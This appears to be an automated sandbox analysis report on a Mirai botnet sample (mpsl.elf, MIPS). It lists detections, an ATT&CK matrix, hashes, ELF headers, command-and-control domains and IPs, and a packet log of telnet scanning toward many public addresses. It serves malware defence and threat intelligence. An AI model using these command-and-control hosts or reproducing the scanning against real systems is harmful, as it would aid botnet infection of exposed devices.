Source: mpsl.elf, 6236.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6241.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6245.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: mpsl.elf, type: SAMPLE
Source: Yara match	File source: 6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: mpsl.elf, type: SAMPLE
Source: Yara match	File source: 6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 File Deletion	1 Brute Force	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mpsl.elf	42%	ReversingLabs	Linux.Exploit.Mirai
mpsl.elf	100%	Avira	EXP/ELF.Mirai.W

Name	IP	Active	Malicious	Reputation
newkittler.ru	185.93.89.106	true	false	high
cats-master.ru	185.93.89.106	true	false	high
kittlerer.ru	185.93.89.106	true	false	high
qittler.ru. [malformed]	unknown	unknown	false	high
gokittler.ru. [malformed]	unknown	unknown	true	unknown
kittler.ru. [malformed]	unknown	unknown	false	high
cats-master.ru. [malformed]	unknown	unknown	true	unknown
thekittler.ru. [malformed]	unknown	unknown	true	unknown
cuttiecats.ru. [malformed]	unknown	unknown	true	unknown
cat-are-here.ru. [malformed]	unknown	unknown	true	unknown
mykittler.ru. [malformed]	unknown	unknown	true	unknown
polizei.su. [malformed]	unknown	unknown	false	high
kittlez.ru. [malformed]	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http:///wget.sh	mpsl.elf	false		high
http:///curl.sh	mpsl.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
4.226.234.4	unknown	United States	3356	LEVEL3US	false
212.225.56.10	unknown	United Kingdom	2529	DEMON-INTERNETNowmaintainedbyCableWirelessWorldwide	false
198.125.69.222	unknown	United States	291	ESNET-EASTUS	false
76.224.64.167	unknown	United States	7018	ATT-INTERNET4US	false
2.229.119.203	unknown	Italy	12874	FASTWEBIT	false
119.91.247.155	unknown	China	24143	CNNIC-QCN-APQingdaoCableTVNetworkCenterCN	false
85.25.61.237	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
109.85.245.208	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
48.130.37.45	unknown	United States	2686	ATGS-MMD-ASUS	false
116.33.52.90	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false
84.148.98.147	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
200.75.33.18	unknown	Colombia	19429	ETB-ColombiaCO	false
41.126.85.162	unknown	South Africa	16637	MTNNS-ASZA	false
200.193.231.216	unknown	Brazil	8167	BrasilTelecomSA-FilialDistritoFederalBR	false
167.57.47.185	unknown	Uruguay	6057	AdministracionNacionaldeTelecomunicacionesUY	false
94.105.81.74	unknown	Belgium	47377	ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquired	false
32.240.96.51	unknown	United States	2686	ATGS-MMD-ASUS	false
14.187.67.174	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
131.147.132.9	unknown	Japan	2527	SO-NETSo-netEntertainmentCorporationJP	false
165.218.132.155	unknown	United States	2381	WISCNET1-ASUS	false
195.25.99.200	unknown	France	3215	FranceTelecom-OrangeFR	false
182.58.57.172	unknown	India	17813	MTNL-APMahanagarTelephoneNigamLimitedIN	false
179.227.37.131	unknown	Brazil	26599	TELEFONICABRASILSABR	false
99.58.237.214	unknown	United States	7018	ATT-INTERNET4US	false
74.69.249.210	unknown	United States	11351	TWC-11351-NORTHEASTUS	false
78.245.106.184	unknown	France	12322	PROXADFR	false
34.111.106.211	unknown	United States	15169	GOOGLEUS	false
115.96.123.252	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	false
113.91.171.126	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
173.161.235.67	unknown	United States	7922	COMCAST-7922US	false
212.237.38.75	unknown	Italy	31034	ARUBA-ASNIT	false
96.193.16.6	unknown	United States	7922	COMCAST-7922US	false
184.15.146.122	unknown	United States	7011	FRONTIER-AND-CITIZENSUS	false
185.165.2.79	unknown	Spain	29119	SERVIHOSTING-ASAireNetworksES	false
21.205.134.202	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
178.218.49.197	unknown	Russian Federation	50789	AIRONET-ASRU	false
185.93.89.106	newkittler.ru	United Kingdom	200861	TS-EMEA-ASNGB	false
62.109.161.137	unknown	Russian Federation	24783	ASN-MELS-MURMANELECTROSVIAZRU	false
120.128.61.54	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
9.138.94.12	unknown	United States	3356	LEVEL3US	false
26.198.108.109	unknown	United States	7922	COMCAST-7922US	false
33.200.209.105	unknown	United States	2686	ATGS-MMD-ASUS	false
119.174.32.119	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
103.55.183.129	unknown	India	63974	RFG-AURETAILFOODGROUPLIMITEDAU	false
61.226.72.47	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
96.230.6.227	unknown	United States	701	UUNETUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.189.91.43	na.elf	Get hash	malicious	Prometei	Browse
	arm4.elf	Get hash	malicious	Mirai	Browse
	dlr.mips.elf	Get hash	malicious	Mirai	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	rep.m68k.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	mips.elf	Get hash	malicious	Mirai	Browse
	arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	na.elf	Get hash	malicious	Prometei	Browse
	arm4.elf	Get hash	malicious	Mirai	Browse
	dlr.mips.elf	Get hash	malicious	Mirai	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	rep.m68k.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	mips.elf	Get hash	malicious	Mirai	Browse
	arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cats-master.ru	arm7.elf	Get hash	malicious	Mirai	Browse	185.93.89.106
	rep.ppc.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
	arm4.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
newkittler.ru	rep.m68k.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
newkittler.ru	rep.ppc.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
kittlerer.ru	Kloki.mpsl.elf	Get hash	malicious	Gafgyt	Browse	83.222.190.91
	arm5.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
	rep.arm5.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
	rep.mpsl.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
	rep.arm4.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
	rep.x86_64.elf	Get hash	malicious	Unknown	Browse	156.229.232.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DEMON-INTERNETNowmaintainedbyCableWirelessWorldwide	res.mips.elf	Get hash	malicious	Unknown	Browse	212.240.3.155
	nklmpsl.elf	Get hash	malicious	Unknown	Browse	212.225.89.73
	boatnet.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	158.153.1.92
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	158.156.17.59
	Fantazy.arm4.elf	Get hash	malicious	Unknown	Browse	193.195.116.175
	sora.mips.elf	Get hash	malicious	Mirai	Browse	80.177.171.212
	g4za.mips.elf	Get hash	malicious	Mirai	Browse	83.105.110.39
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	158.152.124.223
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	83.107.135.95
	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	194.70.52.179
LEVEL3US	rep.m68k.elf	Get hash	malicious	Mirai	Browse	6.103.233.186
	mips.elf	Get hash	malicious	Mirai	Browse	11.152.5.38
	botnet.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	4.123.243.170
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	9.185.142.254
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	9.62.63.196
	botnet.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	205.183.205.156
	.Sarm5.elf	Get hash	malicious	Mirai	Browse	4.121.33.159
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	4.130.250.204
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	8.198.8.253
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	157.199.249.207
ATT-INTERNET4US	https://doxnero.sg-azure.top/	Get hash	malicious	Unknown	Browse	13.32.27.129
	https://doxnero.sg-azure.top/	Get hash	malicious	Unknown	Browse	13.32.27.129
	https://doxnero.sg-azure.top/	Get hash	malicious	HTMLPhisher	Browse	13.32.27.77
	botnet.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	71.150.49.241
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	76.226.188.97
	botnet.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	71.154.187.46
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	99.74.241.164
	botnet.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	75.30.165.111
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	74.237.221.88
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	12.38.242.146
ESNET-EASTUS	nabm68k.elf	Get hash	malicious	Unknown	Browse	198.124.18.126
	mpsl-wrt.elf	Get hash	malicious	Unknown	Browse	198.124.161.118
	res.m68k.elf	Get hash	malicious	Unknown	Browse	198.125.175.180
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	198.127.95.152
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	198.127.95.191
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.127.83.97
	mpsl.elf	Get hash	malicious	Mirai	Browse	198.127.47.223
	arm7.elf	Get hash	malicious	Mirai	Browse	198.127.34.64
	spc.elf	Get hash	malicious	Mirai	Browse	198.127.34.64
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.125.204.6

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.723876301252058
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mpsl.elf
File size:	121'692 bytes
MD5:	006a9f92b1832282b8be08d734c54df9
SHA1:	1b1d9af01b6aa83488277ad3e76ff5e673b88ea1
SHA256:	e622a68781028bc9b322a1ad66d092295ac96203bd7adf39c19009de6e1146bb
SHA512:	12bf2104a57c04830e249e636ea9325134d6b04fed6df078f905e361a9cc078d7deb23ca38688a4c24efc0f318a3df8108370bf676810b98bb94bb1ef9340d70
SSDEEP:	1536:ftg30NfXC5AIb+bjJrQBHppTaOvYD73SU6hgCsqaiIBUtrACbj7EW2PWjwqLtiC5:feEVXCOIb+69bEi54mEW9HBiCKn
TLSH:	A8C38227EB246EF7D4EBCC72D2B9CB0925DD994931A427F56430E824B68740F86978F0
File Content Preview:	.ELF....................`.@.4...,.......4. ...(...............@...@.0...0.....................E...E......:..........Q.td...............................<.S.'!......'.......................<hS.'!... .........9'.. ........................<8S.'!.............9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	121132
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x19d30	0x0	0x6	AX	16
.fini	PROGBITS	0x419e50	0x19e50	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x419eb0	0x19eb0	0x3080	0x0	0x2	A	16
.ctors	PROGBITS	0x45d000	0x1d000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45d008	0x1d008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x45d014	0x1d014	0xe0	0x0	0x3	WA	4
.data	PROGBITS	0x45d100	0x1d100	0x330	0x0	0x3	WA	16
.got	PROGBITS	0x45d430	0x1d430	0x498	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x45d8c8	0x1d8c8	0x24	0x0	0x10000003	WAp	4
.bss	NOBITS	0x45d8f0	0x1d8c8	0x31c8	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x9ea	0x1d8c8	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x1d8c8	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1cf30	0x1cf30	5.7494	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x1d000	0x45d000	0x45d000	0x8c8	0x3ab8	3.6694	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 21:08:10.517976999 CET	52408	23	192.168.2.23	200.75.33.18
Feb 10, 2025 21:08:10.522573948 CET	48174	23	192.168.2.23	120.128.61.54
Feb 10, 2025 21:08:10.525218010 CET	49464	23	192.168.2.23	173.161.235.67
Feb 10, 2025 21:08:10.528652906 CET	39790	23	192.168.2.23	103.55.183.129
Feb 10, 2025 21:08:10.532289982 CET	39406	23	192.168.2.23	131.147.132.9
Feb 10, 2025 21:08:10.535634995 CET	34796	23	192.168.2.23	74.69.249.210
Feb 10, 2025 21:08:10.538039923 CET	53306	23	192.168.2.23	41.126.85.162
Feb 10, 2025 21:08:10.541181087 CET	52490	23	192.168.2.23	21.205.134.202
Feb 10, 2025 21:08:10.543661118 CET	55906	23	192.168.2.23	9.138.94.12
Feb 10, 2025 21:08:10.547106981 CET	35406	23	192.168.2.23	2.229.119.203
Feb 10, 2025 21:08:10.549431086 CET	46906	23	192.168.2.23	34.111.106.211
Feb 10, 2025 21:08:10.554373026 CET	38866	23	192.168.2.23	119.174.32.119
Feb 10, 2025 21:08:10.556859970 CET	58038	23	192.168.2.23	115.96.123.252
Feb 10, 2025 21:08:10.559685946 CET	55098	23	192.168.2.23	84.148.98.147
Feb 10, 2025 21:08:10.562087059 CET	54266	23	192.168.2.23	61.226.72.47
Feb 10, 2025 21:08:10.564789057 CET	48864	23	192.168.2.23	198.125.69.222
Feb 10, 2025 21:08:10.583036900 CET	39570	23	192.168.2.23	167.57.47.185
Feb 10, 2025 21:08:10.613672972 CET	43984	23	192.168.2.23	48.130.37.45
Feb 10, 2025 21:08:10.616638899 CET	35652	23	192.168.2.23	113.91.171.126
Feb 10, 2025 21:08:10.621866941 CET	40376	23	192.168.2.23	94.105.81.74
Feb 10, 2025 21:08:10.629266024 CET	36288	23	192.168.2.23	85.25.61.237
Feb 10, 2025 21:08:10.633100986 CET	39310	23	192.168.2.23	212.237.38.75
Feb 10, 2025 21:08:10.644994020 CET	23	52408	200.75.33.18	192.168.2.23
Feb 10, 2025 21:08:10.645010948 CET	23	48174	120.128.61.54	192.168.2.23
Feb 10, 2025 21:08:10.645021915 CET	23	49464	173.161.235.67	192.168.2.23
Feb 10, 2025 21:08:10.645031929 CET	23	39790	103.55.183.129	192.168.2.23
Feb 10, 2025 21:08:10.645045996 CET	23	39406	131.147.132.9	192.168.2.23
Feb 10, 2025 21:08:10.645056963 CET	23	34796	74.69.249.210	192.168.2.23
Feb 10, 2025 21:08:10.645072937 CET	23	53306	41.126.85.162	192.168.2.23
Feb 10, 2025 21:08:10.645078897 CET	23	52490	21.205.134.202	192.168.2.23
Feb 10, 2025 21:08:10.645085096 CET	23	55906	9.138.94.12	192.168.2.23
Feb 10, 2025 21:08:10.645093918 CET	23	35406	2.229.119.203	192.168.2.23
Feb 10, 2025 21:08:10.645104885 CET	23	46906	34.111.106.211	192.168.2.23
Feb 10, 2025 21:08:10.645106077 CET	49464	23	192.168.2.23	173.161.235.67
Feb 10, 2025 21:08:10.645107985 CET	52408	23	192.168.2.23	200.75.33.18
Feb 10, 2025 21:08:10.645108938 CET	48174	23	192.168.2.23	120.128.61.54
Feb 10, 2025 21:08:10.645111084 CET	39790	23	192.168.2.23	103.55.183.129
Feb 10, 2025 21:08:10.645116091 CET	23	38866	119.174.32.119	192.168.2.23
Feb 10, 2025 21:08:10.645122051 CET	39406	23	192.168.2.23	131.147.132.9
Feb 10, 2025 21:08:10.645122051 CET	52490	23	192.168.2.23	21.205.134.202
Feb 10, 2025 21:08:10.645127058 CET	23	58038	115.96.123.252	192.168.2.23
Feb 10, 2025 21:08:10.645133018 CET	53306	23	192.168.2.23	41.126.85.162
Feb 10, 2025 21:08:10.645137072 CET	23	55098	84.148.98.147	192.168.2.23
Feb 10, 2025 21:08:10.645147085 CET	55906	23	192.168.2.23	9.138.94.12
Feb 10, 2025 21:08:10.645147085 CET	34796	23	192.168.2.23	74.69.249.210
Feb 10, 2025 21:08:10.645147085 CET	38866	23	192.168.2.23	119.174.32.119
Feb 10, 2025 21:08:10.645148993 CET	23	54266	61.226.72.47	192.168.2.23
Feb 10, 2025 21:08:10.645158052 CET	46906	23	192.168.2.23	34.111.106.211
Feb 10, 2025 21:08:10.645159006 CET	35406	23	192.168.2.23	2.229.119.203
Feb 10, 2025 21:08:10.645159006 CET	23	48864	198.125.69.222	192.168.2.23
Feb 10, 2025 21:08:10.645172119 CET	23	39570	167.57.47.185	192.168.2.23
Feb 10, 2025 21:08:10.645181894 CET	58038	23	192.168.2.23	115.96.123.252
Feb 10, 2025 21:08:10.645181894 CET	55098	23	192.168.2.23	84.148.98.147
Feb 10, 2025 21:08:10.645184994 CET	23	43984	48.130.37.45	192.168.2.23
Feb 10, 2025 21:08:10.645190001 CET	48864	23	192.168.2.23	198.125.69.222
Feb 10, 2025 21:08:10.645195961 CET	23	35652	113.91.171.126	192.168.2.23
Feb 10, 2025 21:08:10.645205975 CET	23	40376	94.105.81.74	192.168.2.23
Feb 10, 2025 21:08:10.645210981 CET	39570	23	192.168.2.23	167.57.47.185
Feb 10, 2025 21:08:10.645219088 CET	23	36288	85.25.61.237	192.168.2.23
Feb 10, 2025 21:08:10.645231962 CET	43984	23	192.168.2.23	48.130.37.45
Feb 10, 2025 21:08:10.645246983 CET	40376	23	192.168.2.23	94.105.81.74
Feb 10, 2025 21:08:10.645256996 CET	36288	23	192.168.2.23	85.25.61.237
Feb 10, 2025 21:08:10.645270109 CET	54266	23	192.168.2.23	61.226.72.47
Feb 10, 2025 21:08:10.645270109 CET	35652	23	192.168.2.23	113.91.171.126
Feb 10, 2025 21:08:10.645525932 CET	23	39310	212.237.38.75	192.168.2.23
Feb 10, 2025 21:08:10.650299072 CET	39310	23	192.168.2.23	212.237.38.75
Feb 10, 2025 21:08:10.654331923 CET	55690	23	192.168.2.23	179.227.37.131
Feb 10, 2025 21:08:10.659142971 CET	23	55690	179.227.37.131	192.168.2.23
Feb 10, 2025 21:08:10.659342051 CET	55690	23	192.168.2.23	179.227.37.131
Feb 10, 2025 21:08:10.712424040 CET	39752	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:10.717407942 CET	38241	39752	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:10.717933893 CET	39752	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:10.723608017 CET	40170	23	192.168.2.23	119.91.247.155
Feb 10, 2025 21:08:10.728445053 CET	23	40170	119.91.247.155	192.168.2.23
Feb 10, 2025 21:08:10.728518963 CET	40170	23	192.168.2.23	119.91.247.155
Feb 10, 2025 21:08:10.739327908 CET	46520	23	192.168.2.23	195.25.99.200
Feb 10, 2025 21:08:10.740315914 CET	39752	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:10.744216919 CET	23	46520	195.25.99.200	192.168.2.23
Feb 10, 2025 21:08:10.745094061 CET	38241	39752	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:10.745183945 CET	46520	23	192.168.2.23	195.25.99.200
Feb 10, 2025 21:08:10.746246099 CET	39752	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:10.748476982 CET	48044	23	192.168.2.23	200.193.231.216
Feb 10, 2025 21:08:10.751043081 CET	38241	39752	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:10.753017902 CET	52820	23	192.168.2.23	62.109.161.137
Feb 10, 2025 21:08:10.753273010 CET	23	48044	200.193.231.216	192.168.2.23
Feb 10, 2025 21:08:10.753329992 CET	48044	23	192.168.2.23	200.193.231.216
Feb 10, 2025 21:08:10.757800102 CET	23	52820	62.109.161.137	192.168.2.23
Feb 10, 2025 21:08:10.757853985 CET	52820	23	192.168.2.23	62.109.161.137
Feb 10, 2025 21:08:10.781337023 CET	36806	23	192.168.2.23	76.224.64.167
Feb 10, 2025 21:08:10.786298990 CET	23	36806	76.224.64.167	192.168.2.23
Feb 10, 2025 21:08:10.786369085 CET	36806	23	192.168.2.23	76.224.64.167
Feb 10, 2025 21:08:10.787666082 CET	41534	23	192.168.2.23	109.85.245.208
Feb 10, 2025 21:08:10.792494059 CET	23	41534	109.85.245.208	192.168.2.23
Feb 10, 2025 21:08:10.793525934 CET	41534	23	192.168.2.23	109.85.245.208
Feb 10, 2025 21:08:10.794142962 CET	49174	23	192.168.2.23	96.230.6.227
Feb 10, 2025 21:08:10.798971891 CET	23	49174	96.230.6.227	192.168.2.23
Feb 10, 2025 21:08:10.800614119 CET	49174	23	192.168.2.23	96.230.6.227
Feb 10, 2025 21:08:10.801229954 CET	58000	23	192.168.2.23	14.187.67.174
Feb 10, 2025 21:08:10.806054115 CET	23	58000	14.187.67.174	192.168.2.23
Feb 10, 2025 21:08:10.806180000 CET	58000	23	192.168.2.23	14.187.67.174
Feb 10, 2025 21:08:10.807785034 CET	55108	23	192.168.2.23	4.226.234.4
Feb 10, 2025 21:08:10.812320948 CET	42604	23	192.168.2.23	99.58.237.214
Feb 10, 2025 21:08:10.812551975 CET	23	55108	4.226.234.4	192.168.2.23
Feb 10, 2025 21:08:10.812609911 CET	55108	23	192.168.2.23	4.226.234.4
Feb 10, 2025 21:08:10.817126036 CET	23	42604	99.58.237.214	192.168.2.23
Feb 10, 2025 21:08:10.821680069 CET	42604	23	192.168.2.23	99.58.237.214
Feb 10, 2025 21:08:10.855710030 CET	35562	23	192.168.2.23	116.33.52.90
Feb 10, 2025 21:08:10.860519886 CET	23	35562	116.33.52.90	192.168.2.23
Feb 10, 2025 21:08:10.860583067 CET	35562	23	192.168.2.23	116.33.52.90
Feb 10, 2025 21:08:10.863591909 CET	41352	23	192.168.2.23	185.165.2.79
Feb 10, 2025 21:08:10.868411064 CET	23	41352	185.165.2.79	192.168.2.23
Feb 10, 2025 21:08:10.868491888 CET	41352	23	192.168.2.23	185.165.2.79
Feb 10, 2025 21:08:10.872783899 CET	33494	23	192.168.2.23	178.218.49.197
Feb 10, 2025 21:08:10.877557039 CET	23	33494	178.218.49.197	192.168.2.23
Feb 10, 2025 21:08:10.877621889 CET	33494	23	192.168.2.23	178.218.49.197
Feb 10, 2025 21:08:10.879869938 CET	45980	23	192.168.2.23	212.225.56.10
Feb 10, 2025 21:08:10.884639978 CET	23	45980	212.225.56.10	192.168.2.23
Feb 10, 2025 21:08:10.884692907 CET	45980	23	192.168.2.23	212.225.56.10
Feb 10, 2025 21:08:10.886535883 CET	50856	23	192.168.2.23	33.200.209.105
Feb 10, 2025 21:08:10.891401052 CET	23	50856	33.200.209.105	192.168.2.23
Feb 10, 2025 21:08:10.891453981 CET	50856	23	192.168.2.23	33.200.209.105
Feb 10, 2025 21:08:10.893090963 CET	51518	23	192.168.2.23	96.193.16.6
Feb 10, 2025 21:08:10.897399902 CET	52276	23	192.168.2.23	165.218.132.155
Feb 10, 2025 21:08:10.897830009 CET	23	51518	96.193.16.6	192.168.2.23
Feb 10, 2025 21:08:10.898072958 CET	51518	23	192.168.2.23	96.193.16.6
Feb 10, 2025 21:08:10.902198076 CET	23	52276	165.218.132.155	192.168.2.23
Feb 10, 2025 21:08:10.902313948 CET	52276	23	192.168.2.23	165.218.132.155
Feb 10, 2025 21:08:10.902873039 CET	41426	23	192.168.2.23	184.15.146.122
Feb 10, 2025 21:08:10.907629967 CET	23	41426	184.15.146.122	192.168.2.23
Feb 10, 2025 21:08:10.907684088 CET	41426	23	192.168.2.23	184.15.146.122
Feb 10, 2025 21:08:10.908579111 CET	45090	23	192.168.2.23	182.58.57.172
Feb 10, 2025 21:08:10.913430929 CET	23	45090	182.58.57.172	192.168.2.23
Feb 10, 2025 21:08:10.914284945 CET	45090	23	192.168.2.23	182.58.57.172
Feb 10, 2025 21:08:10.914585114 CET	55872	23	192.168.2.23	32.240.96.51
Feb 10, 2025 21:08:10.919378042 CET	23	55872	32.240.96.51	192.168.2.23
Feb 10, 2025 21:08:10.919498920 CET	55872	23	192.168.2.23	32.240.96.51
Feb 10, 2025 21:08:10.973337889 CET	52150	23	192.168.2.23	26.198.108.109
Feb 10, 2025 21:08:10.978219032 CET	23	52150	26.198.108.109	192.168.2.23
Feb 10, 2025 21:08:10.978374004 CET	52150	23	192.168.2.23	26.198.108.109
Feb 10, 2025 21:08:10.982408047 CET	41654	23	192.168.2.23	78.245.106.184
Feb 10, 2025 21:08:10.987247944 CET	23	41654	78.245.106.184	192.168.2.23
Feb 10, 2025 21:08:10.987549067 CET	41654	23	192.168.2.23	78.245.106.184
Feb 10, 2025 21:08:11.201157093 CET	41654	23	192.168.2.23	78.245.106.184
Feb 10, 2025 21:08:11.201168060 CET	52150	23	192.168.2.23	26.198.108.109
Feb 10, 2025 21:08:11.201168060 CET	45090	23	192.168.2.23	182.58.57.172
Feb 10, 2025 21:08:11.201179028 CET	41426	23	192.168.2.23	184.15.146.122
Feb 10, 2025 21:08:11.201205969 CET	55872	23	192.168.2.23	32.240.96.51
Feb 10, 2025 21:08:11.201206923 CET	50856	23	192.168.2.23	33.200.209.105
Feb 10, 2025 21:08:11.201205969 CET	52276	23	192.168.2.23	165.218.132.155
Feb 10, 2025 21:08:11.201208115 CET	51518	23	192.168.2.23	96.193.16.6
Feb 10, 2025 21:08:11.201210976 CET	45980	23	192.168.2.23	212.225.56.10
Feb 10, 2025 21:08:11.201230049 CET	41352	23	192.168.2.23	185.165.2.79
Feb 10, 2025 21:08:11.201229095 CET	35562	23	192.168.2.23	116.33.52.90
